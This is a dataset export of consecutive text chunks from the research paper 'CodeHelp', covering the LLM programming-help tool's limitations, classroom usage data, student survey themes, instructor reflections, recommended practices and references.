id (stringlengths 12-15) | title (stringlengths 8-162) | content (stringlengths 1-17.6k) | prechunk_id (stringlengths 0-15) | postchunk_id (stringlengths 0-15) | arxiv_id (stringlengths 10-10) | references (listlengths 1-1) |
---|---|---|---|---|---|---|
2308.06921#25 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [Figure 8 screenshot: an instructor's view listing student help requests, with a "Users" panel (username, # queries) and a "Queries" panel (id, user, time, language, code, error, issue, response length, helpful flag); the visible rows are Python/pandas questions from pseudonymous students.] | 2308.06921#24 | 2308.06921#26 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#26 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [Figure 8 screenshot, continued: further query rows plus the table's pagination, export-CSV, and search controls.] Figure 8: | 2308.06921#25 | 2308.06921#27 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#27 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | An instructor's view of student help requests. The full contents of each field are displayed in a tooltip when the user hovers a mouse pointer over it. Note that real usernames have been replaced with pseudonyms. 4 LIMITATIONS AND RISKS CodeHelp is subject to many of the known limitations and risks of using LLMs. In particular, completions can be factually incorrect and can include harmful biases. The problem of inaccuracies in the LLM responses (sometimes called "hallucination" or "confabulation" | 2308.06921#26 | 2308.06921#28 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#28 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | ) is present in CodeHelp with the models it is currently using. Sometimes, the response contains one or more false statements, and this may confuse or mislead the user. Users are sensitised to this issue via the prominent notice above each response saying "Remember: It will not always be correct!" In our experience, when inaccuracies did occur, they were often in a particular detail of the response, which still gave correct high-level guidance or pointed the user in the right direction. In our and our students' experiences, the rate of inaccuracies is low enough for the tool to still be valuable and worth the students' time, and as models improve, the accuracy will improve. LLMs can learn harmful biases such as gender or racial stereotypes from their training data, which can then be reflected in the completions they generate. This is a well-known and heavily studied issue in language model research [36], and it has been an important issue to the computing education community as well [1]. While the models used by CodeHelp have been specifically trained and improved by OpenAI to reduce these biases, some still exist [37]. These models generally do not make offensive statements unless one actively crafts a prompt to elicit one, but for example they might respond in a way that implicitly reflects a common stereotype. This is highly unlikely to occur in the context of requesting help on a specific programming issue, but the possibility exists. The above issues apply to most LLM-based tools, and the likelihood of an LLM's response being incorrect, harmful, off-topic, or otherwise "off the rails" increases with additional rounds of user input and model response. | 2308.06921#27 | 2308.06921#29 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#29 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Therefore, by design, every query to CodeHelp is a one-shot request, independent of any others and with no possibility for follow-up or dialogue. This limits the usefulness of the system, as asking a follow-up question or requesting additional information in the context of an initial response could be very helpful, but the one-shot limitation is imposed to mitigate many of the risks of using LLMs. Users can submit revised queries with additional information or questions informed by an earlier response if they choose to. | 2308.06921#28 | 2308.06921#30 | 2308.06921 | [
"2304.03938"
]
|
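The one-shot design described above can be pictured as a stateless wrapper around the model call: each request carries only the student's current query and never any prior conversation. The sketch below is illustrative only; the class, field, and method names (including the `llm.complete` interface) are assumptions, not CodeHelp's actual implementation.

```python
# Hedged sketch: a stateless, one-shot help request. Nothing from earlier
# queries is included, so each response stands alone by construction.
from dataclasses import dataclass

@dataclass
class HelpRequest:
    language: str   # e.g. "python"
    code: str       # relevant code excerpt supplied by the student
    error: str      # error message, possibly empty
    issue: str      # the student's description of the problem

def answer_one_shot(llm, request: HelpRequest) -> str:
    # Build the prompt from this single request only; no chat history is
    # threaded through, which is what keeps every query independent.
    prompt = (
        "You are a teaching assistant. Give guidance, not complete solutions.\n"
        f"Language: {request.language}\n"
        f"Code:\n{request.code}\n"
        f"Error:\n{request.error}\n"
        f"Issue: {request.issue}\n"
    )
    return llm.complete(prompt)  # 'llm.complete' is a placeholder interface
```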
2308.06921#30 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | 5 EXPERIENCES AND RESULTS We used CodeHelp in two sections of an undergraduate introductory-level computer- and data-science course taught by an author of this paper in the Spring semester of 2023. Fifty-two students completed the course. Of those students, our analyses include data from 49 who used CodeHelp at least once during the semester, and data from 45 who completed a survey about using CodeHelp at the end of the semester. The course is designed to serve a broad audience and attracts students from across the institution who take the course to meet general education requirements or to meet requirements for data-analytic or data-science related credentials. The course provides twelve weeks of instruction in Python foundations and three weeks of instruction in Pandas2 and Seaborn3. The format of the course is " | 2308.06921#29 | 2308.06921#31 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#31 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | flipped," with students responsible for reading course materials prior to class, while class time is spent working through assignments on lab computers. The instructor and a TA assist students and provide instruction/support as needed. CodeHelp was introduced in the fourth week of the semester with a quick demonstration in class. During class, students were encouraged to use CodeHelp for assistance first before asking the instructor or TA for help, but they were otherwise free to make their own choices about when and how to use it. 5.1 Student Use Even with no firm requirement to do so, students used CodeHelp consistently throughout the semester. Figure 9 shows that roughly half of the class used CodeHelp each week, and we saw that roughly 70% of the students used CodeHelp in four or more different weeks. We also observed a wide range of intensity of use between students. Roughly 80% of the class submitted 10 or more queries (indicating more than initial trial usage), roughly 50% submitted 30 or more, and seven of the 49 submitted over 100 queries, including one student with more than 600 queries. The heatmap in Figure 10 shows the usage concentrated during two separate class sessions (1 and 2pm on Mon/Wed/Fri) and before assignments were due on Saturday. Otherwise, there was some use across nearly all hours, including many when no instructor or TA would have been available. Overall, | 2308.06921#30 | 2308.06921#32 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#32 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | 2Pandas. Available at: https://pandas.pydata.org/ [accessed 2023-06-20] 3Seaborn. Available at: https://seaborn.pydata.org/ [accessed 2023-06-20] [Figure 9 bar chart: percentage of students per week.] Figure 9: Percentage of the class (y axis) using CodeHelp each week (x axis) across the semester [7 = spring break]. Note that the y axis scale only extends to 70. The figure shows consistent use across the whole semester. the continuing, consistent usage strongly suggests that the students generally found the tool beneficial. 5.2 Student Survey At the end of the course we distributed an online survey to understand students' perceptions of CodeHelp. Taking the survey was optional, but students did receive extra credit for completing it. A total of 45 students (87 percent of the class) completed the survey. Table 1 shows the results for a selection of questions about students' | 2308.06921#31 | 2308.06921#33 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#33 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | perceptions of the tool and its value to them. Overall, students found it valuable, and a large majority (95%) were interested in using it in future CS courses. For additional detail, the survey included the following open-response questions, which were designed to elicit both positive and negative responses: • Q1: What did you find most beneficial about using CodeHelp? • Q2: Do you think there is anything negative about students using CodeHelp? In general, responses were relatively short but tended to be longer for the first question on beneficial aspects (word count; M = 16.2, SD = 10.3) compared to the second question on negative aspects (M = 12.0, SD = 13.0). To understand the patterns present in the responses, we conducted a thematic analysis in which interesting features of each response were extracted as codes and then collated into higher-level themes [2]. We identified five prominent themes in the response to Q1, highlighted in bold in the text that follows. The most prominent theme by a clear margin, appearing in 19 of the student responses, was around " | 2308.06921#32 | 2308.06921#34 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#34 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | availability" and specifically that students valued the convenience of being able to ask for assistance outside of the classroom when TAs and the professor were busy or unavailable. Responses representative of this theme include: "it was a tool that was always there when I needed it, I didn't have to go to office or TA hours or email" and "the ability to get help without talking to professor or TA". | 2308.06921#33 | 2308.06921#35 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#35 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [Figure 10 heatmap: query counts by hour of day (07:00 to 03:00) and day of week (Sun to Sat).] Figure 10: Queries by hour (y axis) and day (x axis) over the whole term. The time span between 4 and 7 AM is not shown due to no activity. The high activity blocks on Mon, Wed, and Fri correspond to the times students were in the classroom. The higher activity on Saturday evening is prior to a recurring deadline for weekly assignments. Many students (11) explicitly appreciated that CodeHelp could aid them in "fixing errors" | 2308.06921#34 | 2308.06921#36 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#36 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | , which was the next most common theme. This included getting help to understand error messages and producing explanations of errors. The following are two examples of typical quotes supporting this theme: "it was helpful in understanding some of the error message we hadn't learned about in class" and "it really helps with trouble shooting when it comes to semantic errors". One interesting theme that emerged (10 students), distinct from the "availability" of CodeHelp, was that it supported "independence" by enabling students to make progress without the need to seek external help when they were stuck. This included providing initial support to students who had difficulty starting work, nudging students in the right direction when they were close to a solution, and helping students who were anxious to ask for help without the fear of embarrassment. | 2308.06921#35 | 2308.06921#37 | 2308.06921 | [
"2304.03938"
]
|
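The usage patterns reported above (Figure 9's weekly share of active students and Figure 10's hour-by-day heatmap) can be derived from a simple query log. The sketch below assumes a hypothetical CSV with `username` and `time` columns and a class size of 49; it is not the authors' analysis code.

```python
# Hedged sketch: reproducing Figure 9/10-style summaries from a query log.
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt

log = pd.read_csv("codehelp_queries.csv", parse_dates=["time"])  # assumed columns: username, time
class_size = 49  # students who used CodeHelp at least once

# Figure 9 analogue: percentage of the class active in each ISO week.
weekly_pct = (
    log.groupby(log["time"].dt.isocalendar().week)["username"]
       .nunique()
       .div(class_size)
       .mul(100)
)

# Figure 10 analogue: query counts by hour of day and day of week.
counts = (
    log.assign(hour=log["time"].dt.hour, day=log["time"].dt.day_name())
       .pivot_table(index="hour", columns="day", values="username",
                    aggfunc="count", fill_value=0)
)
sns.heatmap(counts)
plt.show()
```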
2308.06921#37 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Comments that supported this theme included "It was nice to have a source to ask when I was unsure how to begin coding", "it helped lead me in the right direction if I almost had the right code" and "I felt like I could ask it any question, even dumb ones, which I often did to avoid embarrassing myself in front of the Professor or TA". The remaining themes, which were less common, focused on the "speed" (6) with which students could make progress or obtain feedback and the use of CodeHelp to assist with "learning/understanding" (7). Typical comments aligning with these themes included "Helped me work faster" and "it helped understand the code I was writing sometimes". Students also appreciated that CodeHelp would provide guidance rather than directly revealing the solution, as exemplified by the comment "It gave us help on the answer not just the answer itself" | 2308.06921#36 | 2308.06921#38 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#38 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | . Overall, the responses to Q1 tell a story that CodeHelp was seen as a useful resource for obtaining rapid assistance and a complementary tool to traditional TA and instructor support. As to the concerns (Q2), we also identified five prominent themes, again highlighted in bold. Around half of the students (24) stated that they had "no concerns". Some of the students would even suggest the use of the tool should have been more extensive: "We Table 1: Results for selected questions in the student survey (n = 45 of 52 students). Rows may not sum to 100% due to rounding. | 2308.06921#37 | 2308.06921#39 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#39 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Table 1 rows (Strongly Agree / Agree / Disagree / Strongly Disagree): "CodeHelp helped me complete my work successfully." 9% / 71% / 18% / 2%; "CodeHelp helped me learn the course material." 7% / 56% / 33% / 4%; "If I took more Computer Science courses, I would like to be able to use CodeHelp in those classes." 31% / 64% / 4% / 0%. should even use it during quizzes". Others explained why they did not have any concerns: "No, absolutely not, especially considering it never handed me the answer on a silver platter." The most prominent theme as to the concerns was the perceived "difficulty" | 2308.06921#38 | 2308.06921#40 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#40 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | in using CodeHelp. Multiple students (14) stated that the tool is difficult to use when the problem is not understood: "sometimes i didnt know exactly what to ask.. but i usually got there eventually" and "I did not like how hard it was to ask something I do not understand.". Several students also reported receiving answers that were difficult to utilize or not helpful: "There were many times that CodeHelp misunderstood my question and gave me advice which confused me even more." and "Sometimes it gives really strange responses that are not related to the problem". | 2308.06921#39 | 2308.06921#41 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#41 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | CodeHelp was easy to introduce to the class. As an instructional resource, its utility is immediately and obviously apparent. Students required little convincing to give it a try. While in class, we requested that students ask CodeHelp for help before seeking help from the instructor or teaching assistant. We did not enforce this as a rule but encouraged it throughout the semester. The idea was that CodeHelp could provide an initial level of support and handle relatively straightforward but common concerns, such as syntax errors. CodeHelp performed very well in this capacity, and given its flexibility and low cost, it is a great addition to the classroom for this functionality alone. However, CodeHelp also provided much more sophisticated help on a huge range of introductory CS problems throughout the semester. Several students (5) reported that sometimes an answer provided by CodeHelp contained elements that were " | 2308.06921#40 | 2308.06921#42 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#42 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | not covered" in class and, hence, the students were not expected to have knowledge of those elements. Responses representative of this theme included: "Sometimes it tells you to do code that we haven't learned in class" and "I would run into the issue where it wanted me to use concepts that I haven't been taught yet. This is both and good and a bad thing because it can introduce students to resources, but also confuse them.". A small number of students' responses (3) hinted at using CodeHelp without investing proper effort in solving the problem independently (i.e., "over-reliance"). The responses suggest that the students were aware this could have negative effects on their learning, yet they would still engage in that practice: "think some people could complete the code without help and by going directly to CodeHelp their limiting themselves" and "I do think that sometimes I can get to dependent on CodeHelp and I have to scale it back a bit.". Several responses (3) stated that CodeHelp is "not human" and, hence, its capabilities are in some way limited as compared to the assistance provided by an instructor or a TA. However, the responses do not go into much detail as to why this might be the case: "less personal" and "No, but it cannot be a substitute for a real person." One of the responses explained the preference for human assistance in terms of difficulty (see above) of formulating the proper question for CodeHelp: "no but personally I prefer to ask a real person because its difficult to phrase you questions in a way that won't confuse CodeHelp". | 2308.06921#41 | 2308.06921#43 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#43 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | CodeHelp appeared to provide accurate and helpful responses to students the majority of the time. CodeHelp did not "give away the answer" or otherwise become a complete replacement for actively working through problems. It appears to strike a nice balance between providing enough information to move students forward without undermining the intent of the assignments. CodeHelp was a great addition to the course in terms of serving students who had difficulty attending office hours or who needed frequent reassurance or feedback as they worked through assignments outside of class time. It was also exceptional in providing a novel avenue for delivering support to students who did not take advantage of traditional avenues of support. | 2308.06921#42 | 2308.06921#44 | 2308.06921 | [
"2304.03938"
]
|
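The avoid-set mechanism referenced in this section (Section 3.3 of the paper) could plausibly be enforced by injecting the avoided topics into the instructions sent to the model. The sketch below is an assumption about the mechanism, not CodeHelp's actual prompt or code.

```python
# Hedged sketch: folding an instructor-specified avoid set into the request.
def build_instructions(avoid_set: set) -> str:
    base = (
        "Help the student with guidance and explanations, "
        "but do not reveal a complete solution."
    )
    if avoid_set:
        avoided = ", ".join(sorted(avoid_set))
        base += (
            " Do not use or suggest any of the following, as they have not "
            f"been covered in this course: {avoided}."
        )
    return base

# Example: a Python foundations course that has not yet covered these topics.
print(build_instructions({"list comprehensions", "lambda", "recursion"}))
```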
2308.06921#44 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | For example, some students who seemed uncomfortable, embarrassed, or otherwise reluctant to ask for help from the instructor or TA had no reservations about asking CodeHelp. CodeHelp sometimes provided assistance that was inconsistent with the content of the class and the knowledge-level of the students. For example, CodeHelp might suggest solving problems with methods that had not yet been introduced. This was confusing and frustrating for some students. During the semester, the avoid set functionality (Section 3.3) was added to allow the instructor to explicitly prohibit certain kinds of content in CodeHelp responses, which largely resolved the problem. Students sometimes provided too little information describing their problem to get a useful response and required some coaching to provide detailed or thoughtful descriptions of problems to CodeHelp. 5.3 Instructor Reflections After the conclusion of the semester, the instructor, who is also one of the authors, reflected on what did and did not work: Reviewing student queries submitted to CodeHelp provided an entirely new type of insight into student learning. In comparison to submitted work, the queries were a much more direct and unfiltered look into student thinking as they worked through problems. | 2308.06921#43 | 2308.06921#45 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#45 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | On some occasions, this feedback guided modifications of assignments and additional class instruction during the semester. Overall, given its great utility in a wide range of circumstances, its ease of use, and low cost, I found CodeHelp to be a tremendous asset in my course. I intend to continue using it in all of my introductory courses moving forward. 6 RECOMMENDED PRACTICES Based on our experiences, we have collected a few recommendations for integrating CodeHelp into a class effectively. Initial introduction. When first introducing CodeHelp to students, motivate its use by sharing some of the benefits identified in this work, as relevant to your course. Explain carefully its strengths and limitations in the context of your course: how it will likely be able to help, and where it may produce incorrect responses. Provide guidance on how to ask for help most effectively. This includes providing the relevant portions of one's code, identifying and copying the important information from error messages, and providing enough information for the issue to be identified. These are the same skills one needs to effectively communicate issues to instructors or peers. Providing good and bad examples or taking a moment to roleplay a few situations may help here. Demonstrate CodeHelp with a few issues similar to those you expect your students to encounter. Model how to provide sufficient information and communicate clearly. During Use. Throughout the course, while students are using CodeHelp, it is helpful to view the students' queries regularly. You can gain detailed insight into where they are struggling at each point in the term that may lead to adapting course plans. Additionally, you might identify students whose usage is not effective (e.g., repeatedly submitting ineffective queries or demonstrating over-reliance), and reach out to them directly to provide guidance or a nudge. Instructors and TAs should sample CodeHelp's responses in each section of the course to spot and mitigate issues. For example, if CodeHelp suggests a technique, function, or concept that does not fit the design of your course, you can add that to the avoid set (Section 3.3) to prevent it from being used in future responses. 7 CONCLUSION AND FUTURE WORK This work shows that LLMs, when properly implemented and integrated into a learning environment, can be a valuable aid to both students and educators. | 2308.06921#44 | 2308.06921#46 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#46 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | We developed CodeHelp to provide immediate, high-quality support to students working on programming exercises while mitigating the risk of fostering an over-reliance on the automated assistance. Providing an automated option for this kind of help can increase the level of support students receive throughout a course due to a combination of being constantly available and avoiding the anxiety associated with asking a professor or TA for help. In our pilot study, students found CodeHelp to be a welcome addition to direct support from a professor and teaching assistants. Going forward, we intend to continue developing and improving CodeHelp. | 2308.06921#45 | 2308.06921#47 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#47 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | The "avoid set" functionality proved to be critical for obtaining course-appropriate responses in many cases, and we plan to give instructors more ways to provide context about their courses and thus further tailor the LLM responses for their students. Additionally, we plan to explore different forms or levels of intervention that might be appropriate depending on the complexity of the task, the experience level of the student, or even the specific learning objectives of the course. And we see many opportunities for the tool to be more individualized, adapting to the needs of each student. For example, it could record and maintain information about each individual student's mastery of different topics, using that to guide the responses generated for them. While encouraging, this work presents only an initial exploration into the effective deployment of LLMs in computing education. For example, while students positively rated CodeHelp and the instructor found it easy to use and deploy, future work should establish more robust metrics for gauging efficacy, such as measuring impact on student learning outcomes or comparing student performance in classrooms that use CodeHelp to those that do not. We also recognize that further work needs to be conducted with larger, more diverse populations of students. It would also be interesting to deploy CodeHelp in different educational settings, such as in distance learning or self-paced programming courses, to evaluate its flexibility and adaptability. Our findings could have implications beyond computing education. LLMs such as those used in CodeHelp could potentially be adapted to support learning in other domains. We hope that our work serves as an impetus for other researchers and educators to explore the use of LLMs in diverse educational contexts, continuing the dialogue around the opportunities and challenges they present. REFERENCES [1] Brett A Becker, Paul Denny, James Finnie-Ansley, Andrew Luxton-Reilly, James Prather, and Eddie Antonio Santos. 2023. | 2308.06921#46 | 2308.06921#48 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#48 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Programming Is Hard - Or at Least It Used to Be: Educational Opportunities and Challenges of AI Code Generation. In Proceedings of the 54th ACM Technical Symposium on Computer Science Education V. 1. 500-506. [2] Virginia Braun and Victoria Clarke. 2006. Using thematic analysis in psychology. Qualitative Research in Psychology 3, 2 (2006), 77-101. https://doi.org/10.1191/1478088706qp063oa [3] Peter Brusilovsky, Barbara J Ericson, Cay S Horstmann, and Christian Servin. 2023. The Future of Computing Education Materials. (2023). [4] Gustavo Carreira, Leonardo Silva, Antonio Jose Mendes, and Hugo Goncalo Oliveira. 2022. | 2308.06921#47 | 2308.06921#49 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#49 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Pyo, a Chatbot Assistant for Introductory Programming Students. In 2022 International Symposium on Computers in Education (SIIE). IEEE, Coimbra, Portugal, 1-6. https://doi.org/10.1109/SIIE56031.2022.9982349 [5] Bei Chen, Fengji Zhang, Anh Nguyen, Daoguang Zan, Zeqi Lin, Jian-Guang Lou, and Weizhu Chen. 2022. | 2308.06921#48 | 2308.06921#50 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#50 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | CodeT: Code Generation with Generated Tests. arXiv:2207.10397 [cs.CL] [6] Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. 2021. Evaluating large language models trained on code. arXiv:2107.03374 [cs.LG] [7] Jonathan E Collins. 2023. | 2308.06921#49 | 2308.06921#51 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#51 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Policy Solutions: Policy questions for ChatGPT and artificial intelligence. Phi Delta Kappan 104, 7 (2023), 60-61. [8] Tyne Crow, Andrew Luxton-Reilly, and Burkhard Wuensche. 2018. Intelligent tutoring systems for programming education: a systematic review. In Proceedings of the 20th Australasian Computing Education Conference. ACM, Brisbane Queensland Australia, 53-62. https://doi.org/10.1145/3160489.3160492 [9] Paul Denny, Viraj Kumar, and Nasser Giacaman. 2023. | 2308.06921#50 | 2308.06921#52 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#52 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Conversing with Copilot: Exploring Prompt Engineering for Solving CS1 Problems Using Natural Language. In Proceedings of the 54th ACM Technical Symposium on Computer Science Education V. 1. ACM, Toronto ON Canada, 1136-1142. https://doi.org/10.1145/3545945.3569823 [10] Paul Denny, Juho Leinonen, James Prather, Andrew Luxton-Reilly, Thezyrie Amarouche, Brett A. Becker, and Brent N. Reeves. 2023. | 2308.06921#51 | 2308.06921#53 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#53 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Promptly: Using Prompt Problems to Teach Learners How to Effectively Utilize AI Code Generators. arXiv:2307.16364 [cs.HC] [11] Paul Denny, James Prather, Brett A. Becker, James Finnie-Ansley, Arto Hellas, Juho Leinonen, Andrew Luxton-Reilly, Brent N. Reeves, Eddie Antonio Santos, and Sami Sarsa. 2023. Computing Education in the Era of Generative AI. arXiv:2306.02608 [cs.CY] [12] James Finnie-Ansley, Paul Denny, Brett A Becker, Andrew Luxton-Reilly, and James Prather. 2022. The robots are coming: Exploring the implications of openai codex on introductory programming. In Proceedings of the 24th Australasian Computing Education Conference. 10-19. https://doi.org/10.1145/3511861.3511863 [13] Zhikai Gao, Sarah Heckman, and Collin Lynch. 2022. | 2308.06921#52 | 2308.06921#54 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#54 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Who Uses Office Hours? A Comparison of In-Person and Virtual Office Hours Utilization. In Proceedings of the 53rd ACM Technical Symposium on Computer Science Education - Volume 1 (Providence, RI, USA) (SIGCSE 2022). Association for Computing Machinery, New York, NY, USA, 300-306. https://doi.org/10.1145/3478431.3499334 [14] Arto Hellas, Juho Leinonen, Sami Sarsa, Charles Koutcheme, Lilja Kujanpää, and Juha Sorva. 2023. | 2308.06921#53 | 2308.06921#55 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#55 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Exploring the Responses of Large Language Models to Beginner Programmers' Help Requests. arXiv:2306.05715 [cs.CY] [15] Sajed Jalil, Suzzana Rafi, Thomas D. LaToza, Kevin Moran, and Wing Lam. 2023. ChatGPT and Software Testing Education: Promises & Perils. In 2023 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW). IEEE. https://doi.org/10.1109/icstw58534.2023.00078 arXiv:2302.03287 | 2308.06921#54 | 2308.06921#56 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#56 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [16] Enkelejda Kasneci, Kathrin Sessler, Stefan Küchemann, Maria Bannert, Daryna Dementieva, Frank Fischer, Urs Gasser, Georg Groh, Stephan Günnemann, Eyke Hüllermeier, Stepha Krusche, Gitta Kutyniok, Tilman Michaeli, Claudia Nerdel, Jürgen Pfeffer, Oleksandra Poquet, Michael Sailer, Albrecht Schmidt, Tina Seidel, Matthias Stadler, Jochen Weller, Jochen Kuhn, and Gjergji Kasneci. 2023. | 2308.06921#55 | 2308.06921#57 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#57 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | ChatGPT for good? On opportunities and challenges of large language models for education. Learning and Individual Differences 103 (2023), 102274. https://doi.org/10.1016/j.lindif.2023.102274 [17] Majeed Kazemitabaar, Justin Chow, Carl Ka To Ma, Barbara J. Ericson, David Weintrop, and Tovi Grossman. 2023. Studying the Effect of AI Code Generators on Supporting Novice Learners in Introductory Programming. In Proceedings of the 2023 CHI Conference on Human Factors in Computing Systems (Hamburg, Germany) (CHI ' | 2308.06921#56 | 2308.06921#58 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#58 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | 23). Association for Computing Machinery, New York, NY, USA, Article 455, 23 pages. https://doi.org/10.1145/3544548.3580919 [18] Hieke Keuning, Johan Jeuring, and Bastiaan Heeren. 2019. A Systematic Literature Review of Automated Feedback Generation for Programming Exercises. ACM Transactions on Computing Education 19, 1 (March 2019), 1-43. https://doi.org/10.1145/3231711 [19] Mario Konecki, Nikola Kadoic, and Rok Piltaver. 2015. | 2308.06921#57 | 2308.06921#59 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#59 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Intelligent assistant for helping students to learn programming. In 2015 38th International Convention on Information and Communication Technology, Electronics and Microelectronics (MIPRO). IEEE, Opatija, Croatia, 924-928. https://doi.org/10.1109/MIPRO.2015.7160406 [20] Juho Leinonen, Paul Denny, Stephen MacNeil, Sami Sarsa, Seth Bernstein, Joanne Kim, Andrew Tran, and Arto Hellas. 2023. | 2308.06921#58 | 2308.06921#60 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#60 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Comparing Code Explanations Created by Students and Large Language Models. arXiv:2304.03938 [cs.CY] [21] Mariam Mahdaoui, Said Nouh, My Seddiq ELKASMI Alaoui, and Mounir Sadiq. 2022. Comparative study between automatic hint generation approaches in Intelligent Programming Tutors. Procedia Computer Science 198 (2022), 391-396. https://doi.org/10.1016/j.procs.2021.12.259 [22] Jessica McBroom, Irena Koprinska, and Kalina Yacef. 2022. A Survey of Automated Programming Hint Generation: The HINTS Framework. Comput. | 2308.06921#59 | 2308.06921#61 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#61 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Surveys 54, 8 (Nov. 2022), 1-27. https://doi.org/10.1145/3469885 [23] Nhan Nguyen and Sarah Nadi. 2022. An empirical evaluation of GitHub Copilot's code suggestions. In Proceedings of the 19th International Conference on Mining Software Repositories. ACM, Pittsburgh Pennsylvania, 1-5. https://doi.org/10.1145/3524842.3528470 | 2308.06921#60 | 2308.06921#62 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#62 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [24] Chinedu Wilfred Okonkwo and Abejide Ade-Ibijola. 2021. Python-Bot: A Chatbot for Teaching Python Programming. Engineering Letters 29 (02 2021), 25-34. [25] Chinedu Wilfred Okonkwo and Abejide Ade-Ibijola. 2022. Revision-Bot: A Chatbot for Studying Past Questions in Introductory Programming. IAENG International Journal of Computer Science 49, 3 (2022). | 2308.06921#61 | 2308.06921#63 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#63 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [26] Zachary A. Pardos and Shreya Bhandari. 2023. Learning gain differences between ChatGPT and human tutor generated algebra hints. arXiv:2302.06871 [cs.CY] [27] James Prather, Paul Denny, Juho Leinonen, Brett A Becker, Ibrahim Albluwi, Michael E Caspersen, Michelle Craig, Hieke Keuning, Natalie Kiesler, Tobias Kohn, et al. 2023. | 2308.06921#62 | 2308.06921#64 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#64 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Transformed by Transformers: Navigating the AI Coding Revolution for Computing Education: An ITiCSE Working Group Conducted by Humans. In Proceedings of the 2023 Conference on Innovation and Technology in Computer Science Education V. 2. 561-562. [28] James Prather, Brent N. Reeves, Paul Denny, Brett A. Becker, Juho Leinonen, Andrew Luxton-Reilly, Garrett Powell, James Finnie-Ansley, and Eddie Antonio Santos. 2023. | 2308.06921#63 | 2308.06921#65 | 2308.06921 | [
"2304.03938"
]
|
